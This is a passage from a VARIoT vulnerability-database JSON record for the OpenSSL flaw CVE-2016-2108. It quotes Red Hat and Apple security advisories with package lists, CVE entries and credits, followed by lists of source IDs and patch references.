7):\n\nSource:\nopenssl-1.0.1e-51.el7_2.5.src.rpm\n\nx86_64:\nopenssl-1.0.1e-51.el7_2.5.x86_64.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.5.i686.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.5.x86_64.rpm\nopenssl-libs-1.0.1e-51.el7_2.5.i686.rpm\nopenssl-libs-1.0.1e-51.el7_2.5.x86_64.rpm\n\nRed Hat Enterprise Linux Client Optional (v. 7):\n\nx86_64:\nopenssl-debuginfo-1.0.1e-51.el7_2.5.i686.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.5.x86_64.rpm\nopenssl-devel-1.0.1e-51.el7_2.5.i686.rpm\nopenssl-devel-1.0.1e-51.el7_2.5.x86_64.rpm\nopenssl-perl-1.0.1e-51.el7_2.5.x86_64.rpm\nopenssl-static-1.0.1e-51.el7_2.5.i686.rpm\nopenssl-static-1.0.1e-51.el7_2.5.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode (v. 7):\n\nSource:\nopenssl-1.0.1e-51.el7_2.5.src.rpm\n\nx86_64:\nopenssl-1.0.1e-51.el7_2.5.x86_64.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.5.i686.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.5.x86_64.rpm\nopenssl-libs-1.0.1e-51.el7_2.5.i686.rpm\nopenssl-libs-1.0.1e-51.el7_2.5.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode Optional (v. 7):\n\nx86_64:\nopenssl-debuginfo-1.0.1e-51.el7_2.5.i686.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.5.x86_64.rpm\nopenssl-devel-1.0.1e-51.el7_2.5.i686.rpm\nopenssl-devel-1.0.1e-51.el7_2.5.x86_64.rpm\nopenssl-perl-1.0.1e-51.el7_2.5.x86_64.rpm\nopenssl-static-1.0.1e-51.el7_2.5.i686.rpm\nopenssl-static-1.0.1e-51.el7_2.5.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 7):\n\nSource:\nopenssl-1.0.1e-51.el7_2.5.src.rpm\n\nppc64:\nopenssl-1.0.1e-51.el7_2.5.ppc64.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.5.ppc.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.5.ppc64.rpm\nopenssl-devel-1.0.1e-51.el7_2.5.ppc.rpm\nopenssl-devel-1.0.1e-51.el7_2.5.ppc64.rpm\nopenssl-libs-1.0.1e-51.el7_2.5.ppc.rpm\nopenssl-libs-1.0.1e-51.el7_2.5.ppc64.rpm\n\nppc64le:\nopenssl-1.0.1e-51.el7_2.5.ppc64le.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.5.ppc64le.rpm\nopenssl-devel-1.0.1e-51.el7_2.5.ppc64le.rpm\nopenssl-libs-1.0.1e-51.el7_2.5.ppc64le.rpm\n\ns390x:\nopenssl-1.0.1e-51.el7_2.5.s390x.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.5.s390.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.5.s390x.rpm\nopenssl-devel-1.0.1e-51.el7_2.5.s390.rpm\nopenssl-devel-1.0.1e-51.el7_2.5.s390x.rpm\nopenssl-libs-1.0.1e-51.el7_2.5.s390.rpm\nopenssl-libs-1.0.1e-51.el7_2.5.s390x.rpm\n\nx86_64:\nopenssl-1.0.1e-51.el7_2.5.x86_64.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.5.i686.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.5.x86_64.rpm\nopenssl-devel-1.0.1e-51.el7_2.5.i686.rpm\nopenssl-devel-1.0.1e-51.el7_2.5.x86_64.rpm\nopenssl-libs-1.0.1e-51.el7_2.5.i686.rpm\nopenssl-libs-1.0.1e-51.el7_2.5.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 7):\n\nppc64:\nopenssl-debuginfo-1.0.1e-51.el7_2.5.ppc.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.5.ppc64.rpm\nopenssl-perl-1.0.1e-51.el7_2.5.ppc64.rpm\nopenssl-static-1.0.1e-51.el7_2.5.ppc.rpm\nopenssl-static-1.0.1e-51.el7_2.5.ppc64.rpm\n\nppc64le:\nopenssl-debuginfo-1.0.1e-51.el7_2.5.ppc64le.rpm\nopenssl-perl-1.0.1e-51.el7_2.5.ppc64le.rpm\nopenssl-static-1.0.1e-51.el7_2.5.ppc64le.rpm\n\ns390x:\nopenssl-debuginfo-1.0.1e-51.el7_2.5.s390.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.5.s390x.rpm\nopenssl-perl-1.0.1e-51.el7_2.5.s390x.rpm\nopenssl-static-1.0.1e-51.el7_2.5.s390.rpm\nopenssl-static-1.0.1e-51.el7_2.5.s390x.rpm\n\nx86_64:\nopenssl-debuginfo-1.0.1e-51.el7_2.5.i686.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.5.x86_64.rpm\nopenssl-perl-1.0.1e-51.el7_2.5.x86_64.rpm\nopenssl-static-1.0.1e-51.el7_2.5.i686.rpm\nopenssl-static-1.0.1e-51.el7_2.5.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 7):\n\nSource:\nopenssl-1.0.1e-51.el7_2.5.src.rpm\n\nx86_64:\nopenssl-1.0.1e-51.el7_2.5.x86_64.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.5.i686.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.5.x86_64.rpm\nopenssl-devel-1.0.1e-51.el7_2.5.i686.rpm\nopenssl-devel-1.0.1e-51.el7_2.5.x86_64.rpm\nopenssl-libs-1.0.1e-51.el7_2.5.i686.rpm\nopenssl-libs-1.0.1e-51.el7_2.5.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 7):\n\nx86_64:\nopenssl-debuginfo-1.0.1e-51.el7_2.5.i686.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.5.x86_64.rpm\nopenssl-perl-1.0.1e-51.el7_2.5.x86_64.rpm\nopenssl-static-1.0.1e-51.el7_2.5.i686.rpm\nopenssl-static-1.0.1e-51.el7_2.5.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2016-0799\nhttps://access.redhat.com/security/cve/CVE-2016-2105\nhttps://access.redhat.com/security/cve/CVE-2016-2106\nhttps://access.redhat.com/security/cve/CVE-2016-2107\nhttps://access.redhat.com/security/cve/CVE-2016-2108\nhttps://access.redhat.com/security/cve/CVE-2016-2109\nhttps://access.redhat.com/security/cve/CVE-2016-2842\nhttps://access.redhat.com/security/updates/classification/#important\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2016 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niD8DBQFXMFlTXlSAg2UNWIIRAhYAAJ0T9Ib2vXUa5te34i6fphHrbe0HlwCfePy5\nWjaK8x9OaI0FgbWyfxvwq6o=\n=jHjh\n-----END PGP SIGNATURE-----\n\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce. 6.7) - i386, ppc64, s390x, x86_64\n\n3. \n\nA security vulnerability in QEMU was addressed by HPE Helion OpenStack. The\nvulnerability could be exploited resulting in local unauthorized data access. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA512\n\nAPPLE-SA-2016-07-18-1 OS X El Capitan v10.11.6 and Security Update\n2016-004\n\nOS X El Capitan v10.11.6 and Security Update 2016-004 is now\navailable and addresses the following:\n\napache_mod_php\nAvailable for: \nOS X Yosemite v10.10.5 and OS X El Capitan v10.11 and later\nImpact: A remote attacker may be able to execute arbitrary code\nDescription: Multiple issues existed in PHP versions prior to\n5.5.36. These were addressed by updating PHP to version 5.5.36. \nCVE-2016-4650\n\nAudio\nAvailable for: OS X El Capitan v10.11 and later\nImpact: A local user may be able to execute arbitrary code with\nkernel privileges\nDescription: A memory corruption issue was addressed through\nimproved memory handling. \nCVE-2016-4647 : Juwei Lin (@fuzzerDOTcn) of Trend Micro\n\nAudio\nAvailable for: OS X El Capitan v10.11 and later\nImpact: A local user may be able to determine kernel memory layout\nDescription: An out-of-bounds read was addressed through improved\ninput validation. \nCVE-2016-4648 : Juwei Lin(@fuzzerDOTcn) of Trend Micro\n\nAudio\nAvailable for: OS X El Capitan v10.11 and later\nImpact: Parsing a maliciously crafted audio file may lead to the\ndisclosure of user information\nDescription: An out-of-bounds read was addressed through improved\nbounds checking. \nCVE-2016-4646 : Steven Seeley of Source Incite working with Trend\nMicro\u0027s Zero Day Initiative\n\nAudio\nAvailable for: OS X El Capitan v10.11 and later\nImpact: A local user may be able to cause a system denial of service\nDescription: A null pointer dereference was addressed through\nimproved input validation. \nCVE-2016-4649 : Juwei Lin(@fuzzerDOTcn) of Trend Micro\n\nbsdiff\nAvailable for: OS X El Capitan v10.11 and later\nImpact: A local attacker may be able to cause unexpected application\ntermination or arbitrary code execution\nDescription: An integer overflow existed in bspatch. This issue was\naddressed through improved bounds checking. \nCVE-2014-9862 : an anonymous researcher\n\nCFNetwork\nAvailable for: OS X El Capitan v10.11 and later\nImpact: A local user may be able to view sensitive user information\nDescription: A permissions issue existed in the handling of web\nbrowser cookies. This issue was addressed through improved\nrestrictions. \nCVE-2016-4645 : Abhinav Bansal of Zscaler Inc. \n\nCoreGraphics\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\nand OS X El Capitan v10.11 and later\nImpact: A remote attacker may be able to execute arbitrary code\nDescription: A memory corruption issue was addressed through\nimproved memory handling. \nCVE-2016-4637 : Tyler Bohan of Cisco Talos (talosintel.com\n/vulnerability-reports)\n\nCoreGraphics\nAvailable for: OS X El Capitan v10.11 and later\nImpact: A local user may be able to elevate privileges\nDescription: An out-of-bounds read issue existed that led to the\ndisclosure of kernel memory. This was addressed through improved\ninput validation. \nCVE-2016-4652 : Yubin Fu of Tencent KeenLab working with Trend\nMicro\u0027s Zero Day Initiative\n\nFaceTime\nAvailable for: OS X El Capitan v10.11 and later\nImpact: An attacker in a privileged network position may be able to\ncause a relayed call to continue transmitting audio while appearing\nas if the call terminated\nDescription: User interface inconsistencies existed in the handling\nof relayed calls. These issues were addressed through improved\nFaceTime display logic. \nCVE-2016-4635 : Martin Vigo\n\nGraphics Drivers\nAvailable for: OS X El Capitan v10.11 and later\nImpact: A local user may be able to execute arbitrary code with\nkernel privileges\nDescription: A memory corruption issue was addressed through\nimproved input validation. \nCVE-2016-4634 : Stefan Esser of SektionEins\n\nImageIO\nAvailable for: OS X El Capitan v10.11 and later\nImpact: A remote attacker may be able to cause a denial of service\nDescription: A memory consumption issue was addressed through\nimproved memory handling. \nCVE-2016-4632 : Evgeny Sidorov of Yandex\n\nImageIO\nAvailable for: OS X El Capitan v10.11 and later\nImpact: A remote attacker may be able to execute arbitrary code\nDescription: Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-2016-4631 : Tyler Bohan of Cisco Talos (talosintel.com\n/vulnerability-reports)\n\nImageIO\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\nand OS X El Capitan v10.11 and later\nImpact: A remote attacker may be able to execute arbitrary code\nDescription: Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-2016-4629 : Tyler Bohan of Cisco Talos (talosintel.com\n/vulnerability-reports)\nCVE-2016-4630 : Tyler Bohan of Cisco Talos (talosintel.com\n/vulnerability-reports)\n\nIntel Graphics Driver\nAvailable for: OS X El Capitan v10.11 and later\nImpact: A malicious application may be able to execute arbitrary\ncode with kernel privileges\nDescription: Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-2016-4633 : an anonymous researcher\n\nIOHIDFamily\nAvailable for: OS X El Capitan v10.11 and later\nImpact: A local user may be able to execute arbitrary code with\nkernel privileges\nDescription: A null pointer dereference was addressed through\nimproved input validation. \nCVE-2016-4626 : Stefan Esser of SektionEins\n\nIOSurface\nAvailable for: OS X El Capitan v10.11 and later\nImpact: A local user may be able to execute arbitrary code with\nkernel privileges\nDescription: A use-after-free was addressed through improved memory\nmanagement. \nCVE-2016-4625 : Ian Beer of Google Project Zero\n\nKernel\nAvailable for: OS X El Capitan v10.11 and later\nImpact: A local user may be able to execute arbitrary code with\nkernel privileges\nDescription: Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-2016-1863 : Ian Beer of Google Project Zero\nCVE-2016-1864 : Ju Zhu of Trend Micro\nCVE-2016-4582 : Shrek_wzw and Proteas of Qihoo 360 Nirvan Team\n\nKernel\nAvailable for: OS X El Capitan v10.11 and later\nImpact: A local user may be able to cause a system denial of service\nDescription: A null pointer dereference was addressed through\nimproved input validation. \nCVE-2016-1865 : CESG, Marco Grassi (@marcograss) of KeenLab\n(@keen_lab), Tencent\n\nlibc++abi\nAvailable for: OS X El Capitan v10.11 and later\nImpact: An application may be able to execute arbitrary code with\nroot privileges\nDescription: Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-2016-4621 : an anonymous researcher\n\nlibexpat\nAvailable for: OS X El Capitan v10.11 and later\nImpact: Processing maliciously crafted XML may lead to unexpected\napplication termination or arbitrary code execution\nDescription: Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-2016-0718 : Gustavo Grieco\n\nLibreSSL\nAvailable for: OS X El Capitan v10.11 and later\nImpact: A remote attacker may be able to execute arbitrary code\nDescription: Multiple issues existed in LibreSSL before 2.2.7. These\nwere addressed by updating LibreSSL to version 2.2.7. \nCVE-2016-2108 : Huzaifa Sidhpurwala (Red Hat), Hanno Boeck, David Benjamin (Google) Mark Brand,\nIan Beer of Google Project Zero\nCVE-2016-2109 : Brian Carpenter\n\nlibxml2\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\nand OS X El Capitan v10.11 and later\nImpact: Parsing a maliciously crafted XML document may lead to\ndisclosure of user information\nDescription: An access issue existed in the parsing of maliciously\ncrafted XML files. This issue was addressed through improved input\nvalidation. \nCVE-2016-4449 : Kostya Serebryany\n\nlibxml2\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\nand OS X El Capitan v10.11 and later\nImpact: Multiple vulnerabilities in libxml2\nDescription: Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-2016-1836 : Wei Lei and Liu Yang of Nanyang Technological\nUniversity\nCVE-2016-4447 : Wei Lei and Liu Yang of Nanyang Technological\nUniversity\nCVE-2016-4448 : Apple\nCVE-2016-4483 : Gustavo Grieco\nCVE-2016-4614 : Nick Wellnhofe\nCVE-2016-4615 : Nick Wellnhofer\nCVE-2016-4616 : Michael Paddon\nCVE-2016-4619 : Hanno Boeck\n\nlibxslt\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\nand OS X El Capitan v10.11 and later\nImpact: Multiple vulnerabilities in libxslt\nDescription: Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-2016-1684 : Nicolas GrA(c)goire\nCVE-2016-4607 : Nick Wellnhofer\nCVE-2016-4608 : Nicolas GrA(c)goire\nCVE-2016-4609 : Nick Wellnhofer\nCVE-2016-4610 : Nick Wellnhofer\nCVE-2016-4612 : Nicolas GrA(c)goire\n\nLogin Window\nAvailable for: OS X El Capitan v10.11 and later\nImpact: A malicious application may be able to execute arbitrary\ncode leading to compromise of user information\nDescription: A memory corruption issue was addressed through\nimproved input validation. \nCVE-2016-4640 : Yubin Fu of Tencent KeenLab working with Trend\nMicro\u0027s Zero Day Initiative\n\nLogin Window\nAvailable for: OS X El Capitan v10.11 and later\nImpact: A malicious application may be able to execute arbitrary\ncode leading to the compromise of user information\nDescription: A type confusion issue was addressed through improved\nmemory handling. \nCVE-2016-4641 : Yubin Fu of Tencent KeenLab working with Trend\nMicro\u0027s Zero Day Initiative\n\nLogin Window\nAvailable for: OS X El Capitan v10.11 and later\nImpact: A local user may be able to cause a denial of service\nDescription: A memory initialization issue was addressed through\nimproved memory handling. \nCVE-2016-4639 : Yubin Fu of Tencent KeenLab working with Trend\nMicro\u0027s Zero Day Initiative\n\nLogin Window\nAvailable for: OS X El Capitan v10.11 and later\nImpact: A malicious application may be able to gain root privileges\nDescription: A type confusion issue was addressed through improved\nmemory handling. \nCVE-2016-4638 : Yubin Fu of Tencent KeenLab working with Trend\nMicro\u0027s Zero Day Initiative\n\nOpenSSL\nAvailable for: OS X El Capitan v10.11 and later\nImpact: A remote attacker may be able to execute arbitrary code\nDescription: Multiple issues existed in OpenSSL. These issues were resolved by backporting the fixes from OpenSSL 1.0.2h/1.0.1 to OpenSSL 0.9.8. \nCVE-2016-2105 : Guido Vranken\nCVE-2016-2106 : Guido Vranken\nCVE-2016-2107 : Juraj Somorovsky\nCVE-2016-2108 : Huzaifa Sidhpurwala (Red Hat), Hanno Boeck, David Benjamin (Google), Mark Brand and Ian Beer of Google Project Zero\nCVE-2016-2109 : Brian Carpenter\nCVE-2016-2176 : Guido Vranken\n\nQuickTime\nAvailable for: OS X El Capitan v10.11 and later\nImpact: Processing a maliciously crafted FlashPix Bitmap Image may\nlead to unexpected application termination or arbitrary code\nexecution\nDescription: Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-2016-4596 : Ke Liu of Tencent\u0027s Xuanwu Lab\nCVE-2016-4597 : Ke Liu of Tencent\u0027s Xuanwu Lab\nCVE-2016-4600 : Ke Liu of Tencent\u0027s Xuanwu Lab\nCVE-2016-4602 : Ke Liu of Tencent\u0027s Xuanwu Lab\n\nQuickTime\nAvailable for: OS X El Capitan v10.11 and later\nImpact: Processing a maliciously crafted image may lead to arbitrary\ncode execution\nDescription: A memory corruption issue was addressed through\nimproved input validation. \nCVE-2016-4598 : Ke Liu of Tencent\u0027s Xuanwu Lab\n\nQuickTime\nAvailable for: OS X El Capitan v10.11 and later\nImpact: Processing a maliciously crafted SGI file may lead to\narbitrary code execution\nDescription: A memory corruption issue was addressed through\nimproved input validation. \nCVE-2016-4601 : Ke Liu of Tencent\u0027s Xuanwu Lab\n\nQuickTime\nAvailable for: OS X El Capitan v10.11 and later\nImpact: Processing a maliciously crafted Photoshop document may lead\nto unexpected application termination or arbitrary code execution\nDescription: A memory corruption issue was addressed through\nimproved input validation. \nCVE-2016-4599 : Ke Liu of Tencent\u0027s Xuanwu Lab\n\nSafari Login AutoFill\nAvailable for: OS X El Capitan v10.11 and later\nImpact: A user\u0027s password may be visible on screen\nDescription: An issue existed in Safari\u0027s password auto-fill. This\nissue was addressed through improved matching of form fields. \nCVE-2016-4595 : Jonathan Lewis from DeARX Services (PTY) LTD\n\nSandbox Profiles\nAvailable for: OS X El Capitan v10.11 and later\nImpact: A local application may be able to access the process list\nDescription: An access issue existed with privileged API calls. This\nissue was addressed through additional restrictions. \nCVE-2016-4594 : Stefan Esser of SektionEins\n\nNote: OS X El Capitan 10.11.6 includes the security content of Safari\n9.1.2. For further details see https://support.apple.com/kb/HT206900\n\n\nOS X El Capitan v10.11.6 and Security Update 2016-004 may be obtained\nfrom the Mac App Store or Apple\u0027s Software Downloads web site:\nhttp://www.apple.com/support/downloads/\n\nInformation will also be posted to the Apple Security Updates\nweb site: http://support.apple.com/kb/HT201222\n\nThis message is signed with Apple\u0027s Product Security PGP key,\nand details are available at:\nhttps://www.apple.com/support/security/pgp/\n-----BEGIN PGP SIGNATURE-----\nComment: GPGTools - https://gpgtools.org\n\niQIcBAEBCgAGBQJXjXAvAAoJEIOj74w0bLRG/5EP/2v9SJTrO+/4b3A1gqC1ch8y\n+cJ04tXRsO7rvjKT5nCylo30U0Sanz/bUbDx4559YS7/P/IyeyZVheaTJwK8wzEy\npSOPpy35hUuVIw0/p4YsuHDThSBPFMmDljTxH7elkfuBV1lPSrCkyDXc0re2HxWV\nxj68zAxtM0jkkhgcxb2ApZSZVXhrjUZtbY0xEVOoWKKFwbMvKfx+4xSqunwQeS1u\nwevs1EbxfvsZbc3pG+xYcOonbegBzOy9aCvNO1Yv1zG+AYXC5ERMq1vk3PsWOTQN\nZVY1I7mvCaEfvmjq2isRw8XYapAIKISDLwMKBSYrZDQFwPQLRi1VXxQZ67Kq1M3k\nah04/lr0RIcoosIcBqxD2+1UAFjUzEUNFkYivjhuaeegN2QdL7Ujegf1QjdAt8lk\nmmKduxYUDOaRX50Kw7n14ZveJqzE1D5I6QSItaZ9M1vR60a7u91DSj9D87vbt1YC\nJM/Rvf/4vonp1NjwA2JQwCiZfYliBDdn9iiCl8mzxdsSRD/wXcZCs05nnKmKsCfc\n55ET7IwdG3622lVheOJGQZuucwJiTn36zC11XVzZysQd/hLD5rUKUQNX1WOgZdzs\nxPsslXF5MWx9jcdyWVSWxDrN0sFk+GpQFQDuVozP60xuxqR3qQ0TXir2NP39uIF5\nYozOGPQFmX0OviWCQsX6\n=ng+m\n-----END PGP SIGNATURE-----\n. \n\nThe References section of this erratum contains a download link (you must\nlog in to download the update)", "sources": [ { "db": "NVD", "id": "CVE-2016-2108" }, { "db": "JVNDB", "id": "JVNDB-2016-002475" }, { "db": "BID", "id": "89752" }, { "db": "VULMON", "id": "CVE-2016-2108" }, { "db": "PACKETSTORM", "id": "142803" }, { "db": "PACKETSTORM", "id": "140056" }, { "db": "PACKETSTORM", "id": "136912" }, { "db": "PACKETSTORM", "id": "139115" }, { "db": "PACKETSTORM", "id": "136937" }, { "db": "PACKETSTORM", "id": "143513" }, { "db": "PACKETSTORM", "id": "137206" }, { "db": "PACKETSTORM", "id": "139167" }, { "db": "PACKETSTORM", "id": "137353" }, { "db": "PACKETSTORM", "id": "137958" }, { "db": "PACKETSTORM", "id": "139116" } ], "trust": 2.97 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2016-2108", "trust": 3.3 }, { "db": "BID", "id": "89752", "trust": 1.4 }, { "db": "PACKETSTORM", "id": "136912", "trust": 1.2 }, { "db": "PULSESECURE", "id": "SA40202", "trust": 1.1 }, { "db": "SIEMENS", "id": "SSA-412672", "trust": 1.1 }, { "db": "BID", "id": "91787", "trust": 1.1 }, { "db": "TENABLE", "id": "TNS-2016-18", "trust": 1.1 }, { "db": "SECTRACK", "id": "1035721", "trust": 1.1 }, { "db": "JUNIPER", "id": "JSA10759", "trust": 1.1 }, { "db": "JVN", "id": "JVNVU93163809", "trust": 0.8 }, { "db": "JVN", "id": "JVNVU94844193", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2016-002475", "trust": 0.8 }, { "db": "ICS CERT", "id": "ICSA-22-349-21", "trust": 0.1 }, { "db": "VULMON", "id": "CVE-2016-2108", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "142803", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "140056", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "139115", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "136937", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "143513", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "137206", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "139167", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "137353", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "137958", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "139116", "trust": 0.1 } ], "sources": [ { "db": "VULMON", "id": "CVE-2016-2108" }, { "db": "BID", "id": "89752" }, { "db": "JVNDB", "id": "JVNDB-2016-002475" }, { "db": "PACKETSTORM", "id": "142803" }, { "db": "PACKETSTORM", "id": "140056" }, { "db": "PACKETSTORM", "id": "136912" }, { "db": "PACKETSTORM", "id": "139115" }, { "db": "PACKETSTORM", "id": "136937" }, { "db": "PACKETSTORM", "id": "143513" }, { "db": "PACKETSTORM", "id": "137206" }, { "db": "PACKETSTORM", "id": "139167" }, { "db": "PACKETSTORM", "id": "137353" }, { "db": "PACKETSTORM", "id": "137958" }, { "db": "PACKETSTORM", "id": "139116" }, { "db": "NVD", "id": "CVE-2016-2108" } ] }, "id": "VAR-201605-0078", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.405729735 }, "last_update_date": "2024-06-12T20:06:13.420000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "Android Security Bulletin-July 2016", "trust": 0.8, "url": "http://source.android.com/security/bulletin/2016-07-01.html" }, { "title": "APPLE-SA-2016-07-18-1 OS X El Capitan v10.11.6 and Security Update 2016-004", "trust": 0.8, "url": "http://lists.apple.com/archives/security-announce/2016/jul/msg00000.html" }, { "title": "HT206903", "trust": 0.8, "url": "https://support.apple.com/en-us/ht206903" }, { "title": "HT206903", "trust": 0.8, "url": "https://support.apple.com/ja-jp/ht206903" }, { "title": "HPSBGN03620", "trust": 0.8, "url": "https://h20566.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05164862" }, { "title": "HPSBGN03610", "trust": 0.8, "url": "https://h20566.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05149345" }, { "title": "SB10160", "trust": 0.8, "url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=sb10160" }, { "title": "NV16-015", "trust": 0.8, "url": "http://jpn.nec.com/security-info/secinfo/nv16-015.html" }, { "title": "OpenSSL 1.0.1 Series Release Notes", "trust": 0.8, "url": "https://www.openssl.org/news/openssl-1.0.1-notes.html" }, { "title": "OpenSSL 1.0.2 Series Release Notes", "trust": 0.8, "url": "https://www.openssl.org/news/openssl-1.0.2-notes.html" }, { "title": "Fix encoding bug in i2c_ASN1_INTEGER", "trust": 0.8, "url": "https://git.openssl.org/?p=openssl.git;a=commit;h=3661bb4e7934668bd99ca777ea8b30eedfafa871" }, { "title": "Fix ASN1_INTEGER handling.", "trust": 0.8, "url": "https://git.openssl.org/?p=openssl.git;a=commit;h=f5da52e308a6aeea6d5f3df98c4da295d7e9cc27" }, { "title": "Memory corruption in the ASN.1 encoder (CVE-2016-2108)", "trust": 0.8, "url": "https://www.openssl.org/news/secadv/20160503.txt" }, { "title": "Oracle Critical Patch Update Advisory - July 2016", "trust": 0.8, "url": "http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html" }, { "title": "Oracle Linux Bulletin - April 2016", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/linuxbulletinapr2016-2952096.html" }, { "title": "Oracle Solaris Third Party Bulletin - April 2016", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/bulletinapr2016-2952098.html" }, { "title": "RHSA-2016:0722", "trust": 0.8, "url": "http://rhn.redhat.com/errata/rhsa-2016-0722.html" }, { "title": "RHSA-2016:0996", "trust": 0.8, "url": "http://rhn.redhat.com/errata/rhsa-2016-0996.html" }, { "title": "SA40202", "trust": 0.8, "url": "https://kb.pulsesecure.net/articles/pulse_security_advisories/sa40202" }, { "title": "JSA10759", "trust": 0.8, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10759" }, { "title": "TLSA-2016-14", "trust": 0.8, "url": "http://www.turbolinux.co.jp/security/2016/tlsa-2016-14j.html" }, { "title": "\u30b5\u30fc\u30d0\u30fb\u30af\u30e9\u30a4\u30a2\u30f3\u30c8\u88fd\u54c1\u306b\u304a\u3051\u308bOpenSSL\u306e\u8106\u5f31\u6027(CVE-2016-2108)\u306b\u3088\u308b\u5f71\u97ff\u306b\u3064\u3044\u3066 (hitachi-sec-2016-201)", "trust": 0.8, "url": "http://www.hitachi.co.jp/products/it/server/security/info/vulnerable/openssl_cve2016-2108.html" }, { "title": "HS16-023", "trust": 0.8, "url": "http://www.hitachi.co.jp/prod/comp/soft1/security/info/vuls/hs16-023/index.html" }, { "title": "The Register", "trust": 0.2, "url": "https://www.theregister.co.uk/2016/05/03/openssl_patches/" }, { "title": "Red Hat: Important: Red Hat JBoss Core Services Apache HTTP Server 2.4.23 Release on RHEL 7", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20170194 - security advisory" }, { "title": "Red Hat: Important: Red Hat JBoss Core Services Apache HTTP Server 2.4.23 Release on RHEL 6", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20170193 - security advisory" }, { "title": "Red Hat: Important: openssl security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20162073 - security advisory" }, { "title": "Red Hat: CVE-2016-2108", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=cve-2016-2108" }, { "title": "Ubuntu Security Notice: openssl vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-2959-1" }, { "title": "Debian Security Advisories: DSA-3566-1 openssl -- security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=055972eb84483959232c972f757685e0" }, { "title": "Amazon Linux AMI: ALAS-2016-695", "trust": 0.1, "url": 